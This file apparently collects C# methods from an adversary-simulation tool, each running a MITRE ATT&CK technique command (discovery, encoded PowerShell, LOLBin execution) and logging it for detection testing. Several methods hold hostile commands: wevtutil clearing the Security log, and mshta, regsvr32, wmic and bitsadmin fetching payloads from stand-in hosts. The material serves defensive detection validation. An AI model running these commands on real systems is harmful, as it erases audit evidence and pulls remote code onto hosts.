示例#1
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1059.003 (Windows Command Shell) by launching
        /// <c>cmd.exe /C whoami</c> and recording the outcome in the simulation log.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void WindowsCommandShell(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            simLog.SimulationHeader("T1059.003");
            try
            {
                // Detection check: the command line below should show up in process-creation
                // telemetry, assuming StartProcessApi spawns a child process — confirm in ExecutionHelper.
                const string commandLine = "cmd.exe /C whoami";
                ExecutionHelper.StartProcessApi("", commandLine, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#2
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1016 (System Network Configuration Discovery) by
        /// running <c>ipconfig /all</c> and logging the result.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void SystemNetworkConfigurationDiscovery(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            simLog.SimulationHeader("T1016");
            try
            {
                // ipconfig is also used routinely by administrators, so a detection built on this
                // command alone will be noisy; it is most useful when correlated with other discovery.
                const string commandLine = "ipconfig /all";
                ExecutionHelper.StartProcess("", commandLine, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#3
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1083 (File and Directory Discovery) with two
        /// <c>dir</c> listings whose output is appended to <c>%temp%\download</c>.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void FileAndDirectoryDiscovery(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            simLog.SimulationHeader("T1083");
            try
            {
                // "dir", ">>" and %temp% are cmd.exe features, so these only work if StartProcess
                // routes the command through a shell — presumably it does; confirm in ExecutionHelper.
                const string listSystemRoot = @"dir c:\ >> %temp%\download";
                const string listUserProfiles = @"dir C:\Users\ >> %temp%\download";

                ExecutionHelper.StartProcess("", listSystemRoot, simLog);
                // The meaning of the trailing 'true' flag is not visible from this method.
                ExecutionHelper.StartProcess("", listUserProfiles, simLog, true);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#4
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1218.011 (Rundll32) by invoking <c>rundll32</c>
        /// against a fixed DLL path and logging the result.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void Rundll32(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            simLog.SimulationHeader("T1218.011");
            try
            {
                // No export name is passed, so the value of this simulation is the rundll32
                // command line itself rather than any code running inside the DLL.
                string dllPath = @"C:\Windows\twain_64.dll";
                string commandLine = String.Format("rundll32 \"{0}\"", dllPath);

                ExecutionHelper.StartProcess("", commandLine, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#5
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1070.001 (Clear Windows Event Logs) by running
        /// <c>wevtutil.exe cl Security</c> and logging the result.
        /// </summary>
        /// <remarks>
        /// Destructive on the host it runs on: if the process has sufficient rights the
        /// Security log really is emptied. Security Event ID 1102 (audit log cleared) is the
        /// record to look for when validating detection coverage.
        /// </remarks>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void ClearSecurityEventLogCmd(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            simLog.SimulationHeader("T1070.001");
            simLog.TimestampInfo("Using the command line to execute the technique");
            try
            {
                const string commandLine = "wevtutil.exe cl Security";
                ExecutionHelper.StartProcess("", commandLine, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#6
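        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1218.004 (InstallUtil) by invoking the .NET Framework
        /// <c>InstallUtil.exe</c> in uninstall mode (<c>/U</c>) against a fixed file path.
        /// </summary>
        /// <remarks>
        /// The original command line carried the typo <c>/LogToConsole=alse</c>; it is now
        /// <c>/LogToConsole=false</c> so the emitted command line matches what detections for
        /// this technique key on.
        /// </remarks>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void InstallUtil(string log)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1218.004");
            try
            {
                // The target path is a fixed sample; nothing in this method creates the file.
                string file = @"C:\Windows\Temp\XKNqbpzl.exe";

                // NOTE(review): "/logfiles" differs from InstallUtil's documented "/LogFile=" option —
                // left unchanged here; confirm which spelling the simulation is meant to emit.
                string commandLine = String.Format(@"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfiles /LogToConsole=false /U {0}", file);

                ExecutionHelper.StartProcess("", commandLine, logger);
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                logger.SimulationFailed(ex);
            }
        }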
示例#7
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1033 (System Owner/User Discovery) by running
        /// <c>whoami</c> followed by <c>query user</c>.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void SystemUserDiscovery(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            simLog.SimulationHeader("T1033");
            try
            {
                // Two separate launches, in this order; an exception from the first skips the second.
                const string currentIdentity = "whoami";
                const string loggedOnSessions = "query user";

                ExecutionHelper.StartProcess("", currentIdentity, simLog);
                ExecutionHelper.StartProcess("", loggedOnSessions, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#8
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1218.005 (Mshta) by launching <c>mshta</c> with a
        /// fixed HTTP URL and logging the result.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void Mshta(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            simLog.SimulationHeader("T1218.005");
            try
            {
                // "webserver" looks like a placeholder host; the signal under test is mshta being
                // started with a remote URL argument, whether or not the fetch succeeds.
                string remoteHta = "http://webserver/payload.hta";
                string commandLine = String.Format("mshta {0}", remoteHta);

                ExecutionHelper.StartProcess("", commandLine, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#9
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1135 (Network Share Discovery) on the local host by
        /// running <c>net share</c> and logging the result.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void NetworkShareEnumerationCmdLocal(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Logger(logPath);

            simLog.SimulationHeader("T1135");
            simLog.TimestampInfo("Using the command line to execute the technique");
            try
            {
                // On Windows "net" normally hands off to net1.exe, so process telemetry may show
                // both images for this single command.
                const string commandLine = "net share";
                ExecutionHelper.StartProcessApi("", commandLine, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#10
        /// <summary>
        /// Simulates PowerShell execution by launching <c>powershell.exe -enc</c> with a
        /// fixed Base64-encoded command, logged under technique ID T1086.
        /// </summary>
        /// <remarks>
        /// T1086 is the retired ATT&amp;CK identifier for PowerShell; current ATT&amp;CK versions
        /// track it as T1059.001. The logged ID is left as the original wrote it.
        /// </remarks>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void ExecutePowershell(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            simLog.SimulationHeader("T1086");
            try
            {
                // Base64 of the UTF-16LE text "Start-Sleep -s 20": a harmless payload, so the
                // observable under test is the encoded-command invocation itself.
                string encodedCommand = "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==";
                string commandLine = String.Format("powershell.exe -enc {0}", encodedCommand);

                ExecutionHelper.StartProcess("", commandLine, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#11
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1047 (Windows Management Instrumentation) by asking
        /// <c>wmic.exe</c> to create a <c>powershell.exe</c> process.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void ExecuteWmiCmd(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            simLog.SimulationHeader("T1047");
            simLog.TimestampInfo("Using the command line to execute the technique");
            try
            {
                // The original wrapped this literal in String.Format with no arguments; the text has
                // no placeholders, so passing it directly produces the same argument string.
                const string wmicArguments = @"process call create ""powershell.exe""";

                // A process created through WMI is normally parented by the WMI provider host, not
                // by wmic.exe, so parent/child detections should account for that.
                ExecutionHelper.StartProcessNET("wmic.exe", wmicArguments, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#12
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1220 (XSL Script Processing) by running
        /// <c>wmic os get</c> with a <c>/FORMAT:</c> value that points at a remote stylesheet.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void XlScriptProcessing(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            simLog.SimulationHeader("T1220");
            try
            {
                // "webserver" looks like a placeholder host; the signal under test is a wmic
                // command line whose /FORMAT: argument is a URL.
                string stylesheetUrl = "http://webserver/payload.xsl";
                string commandLine = String.Format("wmic os get /FORMAT:\"{0}\"", stylesheetUrl);

                ExecutionHelper.StartProcess("", commandLine, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#13
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1218.003 (CMSTP) by running <c>cmstp /s /ns</c>
        /// against a fixed file path. The method name keeps the original "Csmtp" spelling.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void Csmtp(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            simLog.SimulationHeader("T1218.003");
            try
            {
                // The path is hard-coded to the Administrator profile and nothing here creates the
                // file, so on most hosts only the cmstp command line is produced.
                string profileFile = @"C:\Users\Administrator\AppData\Local\Temp\XKNqbpzl.txt";
                string commandLine = String.Format("cmstp /s /ns {0}", profileFile);

                ExecutionHelper.StartProcess("", commandLine, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#14
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1007 (System Service Discovery) by running
        /// <c>net start</c> followed by <c>tasklist /svc</c>.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void SystemServiceDiscovery(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            simLog.SimulationHeader("T1007");
            try
            {
                // With no service name, "net start" only lists the services that are running.
                const string listStartedServices = "net start";
                const string listServicesPerProcess = "tasklist /svc";

                ExecutionHelper.StartProcess("", listStartedServices, simLog);
                ExecutionHelper.StartProcess("", listServicesPerProcess, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#15
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1569.002 (Service Execution) by trying to start a
        /// service named <c>UpdaterService</c>, first with <c>net start</c> and then with <c>sc start</c>.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void ServiceExecution(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            simLog.SimulationHeader("T1569.002");
            try
            {
                // This method does not create "UpdaterService"; unless it already exists on the host,
                // both commands produce command-line telemetry only and no service starts.
                const string startWithNet = "net start UpdaterService";
                const string startWithSc = "sc start UpdaterService";

                ExecutionHelper.StartProcessApi("", startWithNet, simLog);
                ExecutionHelper.StartProcessApi("", startWithSc, simLog);

                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#16
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1018 (Remote System Discovery) by running
        /// <c>net view</c> through <c>cmd.exe /c</c>.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void RemoteSystemDiscoveryCmd(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Logger(logPath);

            simLog.SimulationHeader("T1018");
            simLog.TimestampInfo("Using the command line to execute the technique");

            try
            {
                // Executable and arguments are passed separately here, unlike the StartProcess and
                // StartProcessApi calls elsewhere that take one combined command string.
                const string shell = "cmd.exe";
                const string shellArguments = "/c net view";

                ExecutionHelper.StartProcessNET(shell, shellArguments, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#17
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1059.001 (PowerShell) by launching
        /// <c>powershell.exe -enc</c> with a fixed Base64-encoded command.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void ExecutePowershellCmd(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            simLog.SimulationHeader("T1059.001");
            simLog.TimestampInfo("Using the command line to execute the technique");
            try
            {
                // Base64 of the UTF-16LE text "Start-Sleep -s 20": a harmless payload. If script block
                // logging is enabled, the decoded command should also be visible in PowerShell logs.
                string encodedCommand = "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==";
                string commandLine = String.Format("powershell.exe -enc {0}", encodedCommand);

                ExecutionHelper.StartProcessApi("", commandLine, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#18
        /// <summary>
        /// Simulates clearing the Windows Security event log with
        /// <c>wevtutil.exe cl Security</c>, logged under the parent technique ID T1070
        /// (Indicator Removal).
        /// </summary>
        /// <remarks>
        /// Destructive on the host it runs on: if the process has sufficient rights the
        /// Security log really is emptied. Security Event ID 1102 (audit log cleared) is the
        /// record to look for when validating detection coverage.
        /// </remarks>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void ClearSecurityEventLogCmd(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            // The header call replaces two hand-written start-up log lines (host name, agent
            // path and PID) that the original kept only as commented-out code.
            simLog.SimulationHeader("T1070");
            try
            {
                const string commandLine = "wevtutil.exe cl Security";
                ExecutionHelper.StartProcess("", commandLine, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#19
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1049 (System Network Connections Discovery) by running
        /// <c>netstat</c>, <c>net use</c> and <c>net session</c> in that order.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void SystemNetworkConnectionsDiscovery(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            simLog.SimulationHeader("T1049");
            try
            {
                // Three short-lived processes in quick succession; the burst of discovery commands
                // is a stronger signal than any one of them alone.
                const string activeConnections = "netstat";
                const string mappedShares = "net use";
                const string inboundSessions = "net session";

                ExecutionHelper.StartProcess("", activeConnections, simLog);
                ExecutionHelper.StartProcess("", mappedShares, simLog);
                ExecutionHelper.StartProcess("", inboundSessions, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#20
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1140 (Deobfuscate/Decode Files or Information) by
        /// running <c>certutil -decode</c> with fixed input and output file names.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void DeobfuscateDecode(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            simLog.SimulationHeader("T1140");
            try
            {
                // Both names are relative and this method does not create the input file, so whether
                // anything is decoded depends on the working directory of the spawned process.
                string inputFile = "encodedb64.txt";
                string outputFile = "decoded.exe";
                string commandLine = String.Format("certutil -decode {0} {1}", inputFile, outputFile);

                ExecutionHelper.StartProcess("", commandLine, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#21
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1087.002 (Account Discovery: Domain Account) by
        /// running <c>net user /domain</c> and logging the result.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void DomainAccountDiscoveryCmd(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            simLog.SimulationHeader("T1087.002");
            simLog.TimestampInfo("Using the command line to execute the technique");

            try
            {
                // The /domain switch sends the query to a domain controller, so the command needs a
                // domain-joined host to return results; the command line is logged either way.
                const string commandLine = "net user /domain";
                ExecutionHelper.StartProcess("", commandLine, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#22
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1197 (BITS Jobs) by running a
        /// <c>bitsadmin /transfer</c> download command with a fixed URL and destination path.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void BitsJobs(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            simLog.SimulationHeader("T1197");
            try
            {
                // "web.evil" looks like a placeholder host. The destination is named like an Office
                // binary but sits in C:\Windows\Temp; that mismatch is itself worth alerting on.
                string sourceUrl = "http://web.evil/sc.exe";
                string destinationPath = @"C:\Windows\Temp\winword.exe";
                string commandLine = String.Format("bitsadmin /transfer job /download /priority high {0} {1}", sourceUrl, destinationPath);

                ExecutionHelper.StartProcess("", commandLine, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#23
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1059.007 (JavaScript) by launching
        /// <c>wscript.exe</c> with a fixed <c>.js</c> file name.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void JScript(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            simLog.SimulationHeader("T1059.007");

            try
            {
                // The script name is relative and is not created here; the observable is wscript.exe
                // being started with a .js argument.
                string scriptFile = "invoice0420.js";
                string commandLine = String.Format("wscript.exe {0}", scriptFile);

                ExecutionHelper.StartProcessApi("", commandLine, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#24
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1218.010 (Regsvr32) by running <c>regsvr32.exe</c>
        /// with <c>/i:</c> set to a remote scriptlet URL and <c>scrobj.dll</c> as the DLL.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void Regsvr32(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            simLog.SimulationHeader("T1218.010");
            try
            {
                // "malicious.domain" looks like a placeholder host; the detection target is the
                // combination of a URL in /i: with scrobj.dll on a regsvr32 command line.
                string scriptletUrl = @"http://malicious.domain:8080/payload.sct";
                string scriptObjectDll = "scrobj.dll";
                string commandLine = String.Format("regsvr32.exe /u /n /s /i:{0} {1}", scriptletUrl, scriptObjectDll);

                ExecutionHelper.StartProcess("", commandLine, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#25
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1218.009 (Regsvcs/Regasm) by running
        /// <c>regsvcs.exe /U</c> and then <c>regasm.exe /U</c> against a fixed DLL name.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void RegsvcsRegasm(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            simLog.SimulationHeader("T1218.009");
            try
            {
                // Both tools are taken from the 32-bit v4.0.30319 framework directory; a detection
                // should not assume that path and should cover the Framework64 copies as well.
                string assemblyFile = @"winword.dll";
                string regsvcsCommand = String.Format(@"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U {0}", assemblyFile);
                ExecutionHelper.StartProcess("", regsvcsCommand, simLog);

                string regasmCommand = String.Format(@"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U {0}", assemblyFile);
                ExecutionHelper.StartProcess("", regasmCommand, simLog);

                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#26
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1482 (Domain Trust Discovery) by running
        /// <c>nltest.exe /domain_trusts</c> and logging the result.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void DomainTrustDiscoveryCmd(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Logger(logPath);

            simLog.SimulationHeader("T1482");
            simLog.TimestampInfo("Using the command line to execute the technique");

            try
            {
                // The original keeps a disabled StartProcessApi variant of this same command;
                // only the StartProcessNET launch is active.
                const string executable = "nltest.exe";
                const string arguments = "/domain_trusts";

                ExecutionHelper.StartProcessNET(executable, arguments, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#27
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1201 (Password Policy Discovery) by running
        /// <c>net accounts</c> for the local policy and <c>net accounts /domain</c> for the domain policy.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void PasswordPolicyDiscovery(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            simLog.SimulationHeader("T1201");
            simLog.TimestampInfo("Using the command line to execute the technique");

            try
            {
                // The /domain variant needs a domain-joined host to return a policy; on a
                // standalone machine only the local query yields output.
                const string localPolicy = "net accounts";
                const string domainPolicy = "net accounts /domain";

                ExecutionHelper.StartProcessApi("", localPolicy, simLog);
                ExecutionHelper.StartProcessApi("", domainPolicy, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#28
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1033 (System Owner/User Discovery) by running
        /// <c>whoami</c> followed by <c>query user</c>.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void SystemUserDiscovery(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            // The header call replaces two hand-written start-up log lines (host name, agent
            // path and PID) that the original kept only as commented-out code.
            simLog.SimulationHeader("T1033");
            try
            {
                const string currentIdentity = "whoami";
                const string loggedOnSessions = "query user";

                ExecutionHelper.StartProcess("", currentIdentity, simLog);
                ExecutionHelper.StartProcess("", loggedOnSessions, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#29
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1069.001 (Permission Groups Discovery: Local Groups) by
        /// listing all local groups and then the members of <c>Administrators</c>.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void LocalGroups(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            simLog.SimulationHeader("T1069.001");
            simLog.TimestampInfo("Using the command line to execute the technique");

            try
            {
                // The group name is the English built-in name; on localized Windows installs the
                // second command may find no such group.
                const string listGroups = "net localgroup";
                const string listAdministrators = "net localgroup \"Administrators\"";

                ExecutionHelper.StartProcess("", listGroups, simLog);
                ExecutionHelper.StartProcess("", listAdministrators, simLog);
                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }
示例#30
        /// <summary>
        /// Simulates MITRE ATT&amp;CK T1124 (System Time Discovery) by running
        /// <c>w32tm /tz</c> followed by <c>time /T</c>.
        /// </summary>
        /// <param name="log">Log file name; it is appended to the application base directory.</param>
        public static void SystemTimeDiscovery(string log)
        {
            string logPath = AppDomain.CurrentDomain.BaseDirectory + log;
            var simLog = new Lib.Logger(logPath);

            simLog.SimulationHeader("T1124");
            simLog.TimestampInfo("Using the command line to execute the technique");

            try
            {
                // "time" is a cmd.exe built-in with no executable of its own, so the second command
                // only works if StartProcess goes through a shell — confirm in ExecutionHelper.
                const string timeZoneQuery = "w32tm /tz";
                const string currentTimeQuery = "time /T";

                ExecutionHelper.StartProcess("", timeZoneQuery, simLog);
                ExecutionHelper.StartProcess("", currentTimeQuery, simLog);

                simLog.SimulationFinished();
            }
            catch (Exception failure)
            {
                // Best-effort: failures are written to the simulation log, never rethrown.
                simLog.SimulationFailed(failure);
            }
        }